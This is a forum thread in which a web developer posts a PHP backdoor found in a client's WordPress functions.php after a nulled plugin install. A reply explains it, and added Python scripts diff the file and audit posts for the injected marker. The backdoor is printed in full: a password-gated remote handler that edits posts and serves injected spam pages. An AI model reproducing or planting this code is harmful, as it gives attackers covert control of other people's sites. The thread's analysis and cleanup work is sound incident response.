Jayy (Mr. Ponzi)
Joined: 08 Jun 2009
Posted: 23:56 - 17 May 2017
Post subject: Any coders: PHP / MySQL - Hacked file help

Well, I found some code inside a functions.php file of a WordPress install. Client had told me he found "free premium plugins" and installed them... I thought, oh no, what have you done?
Any ideas what this does?
As far as I can work out, some kind of password sniffer?
Code:

```php
<?php
// Entry point of the injected block: any request (GET or POST) carrying
// action= and the hard-coded token reaches this branch. The token is the
// attacker's own secret, not a WordPress credential.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '24daf8bf7eb6d45d9aa91bf1979b414a'))
{
    switch ($_REQUEST['action'])
    {
        // Lists every published post (GUID, ID) together with whatever has
        // already been injected inside a <div id="wp_cd_code"> block.
        case 'get_all_links';
            foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
            {
                $data['code'] = '';
                if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                {
                    $data['code'] = $_[1];
                }
                print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
            }
            break;
        // Replaces (or, with empty data, removes) the <div id="wp_cd_code">
        // block at the end of one post's content, i.e. edits the post.
        case 'set_id_links';
            if (isset($_REQUEST['data']))
            {
                $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
                $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
                if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                {
                    print "true";
                }
            }
            break;
        // Creates or deletes a fake page in the extra <prefix>datalist table;
        // these pages are served by the second block below.
        case 'create_page';
            if (isset($_REQUEST['remove_page']))
            {
                if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                {
                    print "true";
                }
            }
            elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
            {
                if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                {
                    print "true";
                }
            }
            break;
        default: print "ERROR_WP_ACTION WP_URL_CD";
    }
    // Nothing after this runs for a handled request, so the normal site
    // output is suppressed.
    die("");
}
// Runs on every page load: if the requested URI matches a row in the
// datalist table, that stored content is served instead of the real site.
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
    $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    if ($data -> full_content)
    {
        print stripslashes($data -> content);
    }
    else
    {
        // Wraps the stored content in a minimal page that still pulls in the
        // theme's head, sidebar and footer so it looks like part of the site.
        print '<!DOCTYPE html>';
        print '<html ';
        language_attributes();
        print ' class="no-js">';
        print '<head>';
        print '<title>'.stripslashes($data -> title).'</title>';
        print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
        print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
        print '<meta name="robots" content="index, follow" />';
        print '<meta charset="';
        bloginfo( 'charset' );
        print '" />';
        print '<meta name="viewport" content="width=device-width">';
        print '<link rel="profile" href="http://gmpg.org/xfn/11">';
        print '<link rel="pingback" href="';
        bloginfo( 'pingback_url' );
        print '">';
        wp_head();
        print '</head>';
        print '<body>';
        print '<div id="content" class="site-content">';
        print stripslashes($data -> content);
        get_search_form();
        get_sidebar();
        get_footer();
    }
    exit;
}
?><?php
```
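As an added example (not code from this thread or from any of its posters), here is the kind of check a practitioner would script for the most useful triage step with a file like this: diff the live functions.php against a known-good copy and flag the added lines for the traits the posted code shows (a request parameter compared against a hard-coded token, request values concatenated into `$wpdb` queries, `mysql_escape_string`, the `wp_cd_code` marker, the extra `datalist` table, `die`/`exit` after output, and the `?><?php` splice). `CLEAN_FUNCTIONS` and `SUSPECT_FUNCTIONS` are constructed stand-ins for the backup and the live file; the indicator list is written from the code above and is not a general malware signature set.

```python
"""Triage helper: diff a suspicious WordPress functions.php against a known-good
copy and flag the added lines that show the traits of the code posted above.

Added example for this thread, not code from the original post. CLEAN_FUNCTIONS
and SUSPECT_FUNCTIONS are constructed stand-ins for the backup and the live
file; the indicator regexes are written from the posted code and are not a
general-purpose malware signature set.
"""
import difflib
import re

# Constructed stand-in for a clean theme functions.php (the backup copy).
CLEAN_FUNCTIONS = """<?php
function mytheme_setup() {
    add_theme_support('title-tag');
}
add_action('after_setup_theme', 'mytheme_setup');
?>"""

# Constructed stand-in for the live file: the clean file with a block spliced
# onto its closing tag, using representative lines from the posted code.
SUSPECT_FUNCTIONS = CLEAN_FUNCTIONS + """<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '24daf8bf7eb6d45d9aa91bf1979b414a'))
{
    $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
    $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
    die("");
}
?><?php"""

# (short id, description, regex). List order is kept in the per-line report.
INDICATORS = [
    ("hardcoded_secret", "request parameter compared against a hard-coded 32-hex token",
     re.compile(r"\$_(REQUEST|GET|POST)\['\w+'\]\s*==\s*'[0-9a-f]{32}'")),
    ("sql_concat", "request parameter concatenated into a $wpdb query string",
     re.compile(r"\$wpdb\s*->\s*(query|get_row|get_var|get_results)\(.*\$_(REQUEST|GET|POST)\[")),
    ("mysql_escape_string", "deprecated mysql_escape_string() call",
     re.compile(r"\bmysql_escape_string\(")),
    ("wp_cd_code_marker", 'injected-content marker <div id="wp_cd_code">',
     re.compile(r"wp_cd_code")),
    ("datalist_table", "reference to the extra <prefix>datalist table",
     re.compile(r"\bdatalist`")),
    ("die_exit", "request terminated after handling (die/exit)",
     re.compile(r"\b(die|exit)\s*\(")),
    ("tag_splice", "PHP tag splice ?><?php",
     re.compile(r"\?><\?php")),
]


def added_lines(clean, suspect):
    """Return (line number in suspect, text) for every line that is not in clean."""
    clean_lines = clean.splitlines()
    suspect_lines = suspect.splitlines()
    matcher = difflib.SequenceMatcher(None, clean_lines, suspect_lines)
    added = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            for j in range(j1, j2):
                added.append((j + 1, suspect_lines[j]))
    return added


def flag_indicators(lines):
    """Keep only the added lines that match at least one indicator, with the ids matched."""
    hits = []
    for lineno, text in lines:
        ids = [short for short, _desc, rx in INDICATORS if rx.search(text)]
        if ids:
            hits.append((lineno, ids))
    return hits


def triage(clean, suspect):
    """Summarise the diff: number of added lines, flagged lines, distinct indicators seen."""
    added = added_lines(clean, suspect)
    flagged = flag_indicators(added)
    seen = sorted({short for _lineno, ids in flagged for short in ids})
    return {"added": len(added), "flagged": flagged, "indicators": seen}


if __name__ == "__main__":
    result = triage(CLEAN_FUNCTIONS, SUSPECT_FUNCTIONS)
    print(f"{result['added']} added line(s); indicators seen: {', '.join(result['indicators'])}")
    for lineno, ids in result["flagged"]:
        print(f"  line {lineno}: {', '.join(ids)}")
```

Against real files, read both copies with `open(...).read()` and pass them to `triage`; a clean diff of a theme update will still show added lines, so the indicator column, not the line count, is what separates a legitimate change from a spliced-in block like the one above.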
ScaredyCat (World Chat Champion)
Joined: 19 May 2012
This post is not being displayed.

Kickstart (The Oracle)
Joined: 04 Feb 2002
Posted: 00:25 - 18 May 2017

Hi
Yep, allowing some posts to be modified by a user with a specific password. Also the ability to list out some posts (probably to make it easier to screw around with them).
Note that once used it will likely screw up the details on the post table, and this might already have happened.
Amusing that a hacky type script is using mysql_escape_string.
All the best
Katy
Jayy (Mr. Ponzi)
Joined: 08 Jun 2009
Posted: 13:17 - 18 May 2017

Scenario was: the client had a guy "doing website stuff" for him but had messaged me to remove all his access as he didn't trust this guy.
I start changing all passwords on hosting, WordPress, emails, etc etc.
Then he asks whether there is a way to get login notifications, so I enabled them via Wordfence.
Wordfence flagged the file as being found 20 hrs ago when I started looking into it.
Compared the functions.php file with a backup I had from 6 months ago of his site and saw the added code I pasted up there.
From doing my own research and following those links, ScaredyCat, I'm not sure what damage this has done.
I don't see the class.wp.php file, nor do I see any of those other files they reference, but I did see the _datalist table in the database (nothing in it).
Wordfence detects no core files changed, so I don't see the point in replacing all of them.
All plugins are up to date and WordPress is. All passwords changed and backups taken.
Will keep an eye on it; client is reluctant to spend money on having it fixed properly (don't you just love them?).
Client is the one who installed the premium version of Yoast SEO... which he downloaded off a nulled site.
I actually see nulled plugins installed on sites quite frequently these days. I don't know whether it's some office person who doesn't really understand the gravity of what they're doing or some dev who also doesn't understand / wants to save a couple bucks :/
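Beyond the file itself, the posted code leaves two places where its effects could persist: the extra `_datalist` table (found empty here) and the `<div id="wp_cd_code">` blocks it appends to post content. As an added example (not code from this thread), the script below audits post rows for that marker using the same pattern the backdoor itself uses, reports which posts carry injected fragments, and returns the stripped content. `SAMPLE_POSTS` is a constructed stand-in for what `SELECT ID, post_content FROM <prefix>posts` would return; on a real site the rows come from the database and the write-back is a separate, reviewed step.

```python
"""Audit WordPress post content for the injected <div id="wp_cd_code"> block.

Added example for this thread, not code from any post in it. SAMPLE_POSTS is a
constructed stand-in for rows of (ID, post_content); on a real site you would
read them from the database and write the cleaned content back only after
reviewing the report.
"""
import re

# Same marker pattern the posted code uses to find and replace its block
# (PHP's /s modifier == re.S, so the fragment may span lines).
MARKER_RE = re.compile(r'<div id="wp_cd_code">(.*?)</div>', re.S)

# Constructed sample rows: (ID, post_content). Post 101 is clean, 102 carries
# one injected link, 103 carries two fragments, one of them multi-line.
SAMPLE_POSTS = [
    (101, "<p>Track day report.</p>"),
    (102, '<p>Gearing notes.</p><div id="wp_cd_code"><a href="http://example.invalid/x">link</a></div>'),
    (103, '<p>Intro</p><div id="wp_cd_code">first</div><p>More</p>'
          '<div id="wp_cd_code">second\nmultiline</div>'),
]


def find_injected(post_content):
    """Return the inner HTML of every marker div in one post."""
    return MARKER_RE.findall(post_content)


def strip_injected(post_content):
    """Remove every marker div; unlike the backdoor's preg_replace, nothing is re-appended."""
    return MARKER_RE.sub("", post_content)


def audit_posts(rows):
    """Return ({ID: [fragments]} for affected posts, cleaned list of (ID, content))."""
    report = {}
    cleaned = []
    for post_id, content in rows:
        fragments = find_injected(content)
        if fragments:
            report[post_id] = fragments
            content = strip_injected(content)
        cleaned.append((post_id, content))
    return report, cleaned


if __name__ == "__main__":
    report, cleaned = audit_posts(SAMPLE_POSTS)
    for post_id, fragments in report.items():
        print(f"post {post_id}: {len(fragments)} injected fragment(s)")
        for fragment in fragments:
            print("   ", repr(fragment))
    # A second pass over the cleaned rows should find nothing.
    print("remaining after cleanup:", audit_posts(cleaned)[0])
```

Run it once in report-only mode first: the fragments it prints are the evidence of what was placed in each post, which is worth keeping before anything is overwritten.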
ScaredyCat (World Chat Champion)
Joined: 19 May 2012
This post is not being displayed.

Kickstart (The Oracle)
Joined: 04 Feb 2002
This post is not being displayed.

Jayy (Mr. Ponzi)
Joined: 08 Jun 2009
This post is not being displayed.